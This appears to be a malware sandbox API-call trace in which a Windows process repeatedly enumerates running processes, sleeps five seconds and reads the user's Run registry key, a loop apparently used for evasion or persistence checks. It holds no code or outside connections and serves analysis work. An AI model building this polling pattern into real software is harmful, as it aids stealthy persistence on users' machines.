[0174.597] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0174.601] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0174.602] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0174.605] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0174.605] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0174.606] NtClose (Handle=0x274) returned 0x0 [0174.606] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0174.606] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0174.608] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0174.608] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0174.608] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0174.612] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0174.612] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0174.615] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0174.616] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0174.616] NtClose (Handle=0x274) returned 0x0 [0174.616] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0174.616] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0174.618] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0174.618] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0174.618] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0174.622] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0174.623] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0174.626] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0174.627] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0174.627] NtClose (Handle=0x274) returned 0x0 [0174.627] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0174.627] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0174.629] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0174.629] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0174.629] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0174.633] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0174.634] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0174.636] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0174.636] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0174.636] NtClose (Handle=0x274) returned 0x0 [0174.637] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0174.637] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0174.639] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0174.639] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0174.639] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0174.643] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0174.643] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0174.645] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0174.646] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0174.646] NtClose (Handle=0x274) returned 0x0 [0174.646] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0174.647] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0174.649] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0174.649] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0174.649] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0174.653] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0174.654] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0174.656] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0174.658] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0174.658] NtClose (Handle=0x274) returned 0x0 [0174.658] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0174.658] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0174.661] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0174.661] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0174.661] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0174.666] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0174.667] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0174.674] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0174.675] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0174.675] NtClose (Handle=0x274) returned 0x0 [0174.675] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0174.676] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0174.678] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0174.678] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0174.679] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0174.683] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0174.684] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0174.691] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0174.693] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0174.693] NtClose (Handle=0x274) returned 0x0 [0174.693] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0174.693] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0174.696] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0174.696] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0174.696] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0174.702] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0174.703] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0174.711] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0174.712] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0174.712] NtClose (Handle=0x274) returned 0x0 [0174.712] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0174.713] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0174.715] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0174.715] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0174.716] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0174.721] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0174.722] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0174.723] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0174.725] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0174.725] NtClose (Handle=0x274) returned 0x0 [0174.725] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0174.725] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0174.729] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0174.730] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0174.730] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0174.735] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0174.735] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0174.740] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0174.741] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0174.741] NtClose (Handle=0x274) returned 0x0 [0174.741] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0174.741] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0174.744] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0174.744] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0174.744] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0174.749] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0174.750] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0174.752] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0174.753] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0174.753] NtClose (Handle=0x274) returned 0x0 [0174.755] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0174.755] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0174.758] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0174.758] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0174.758] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0174.763] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0174.764] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0174.766] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0174.768] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0174.768] NtClose (Handle=0x274) returned 0x0 [0174.768] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0174.768] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0174.771] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0174.771] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0174.771] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0174.776] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0174.777] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0174.779] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, 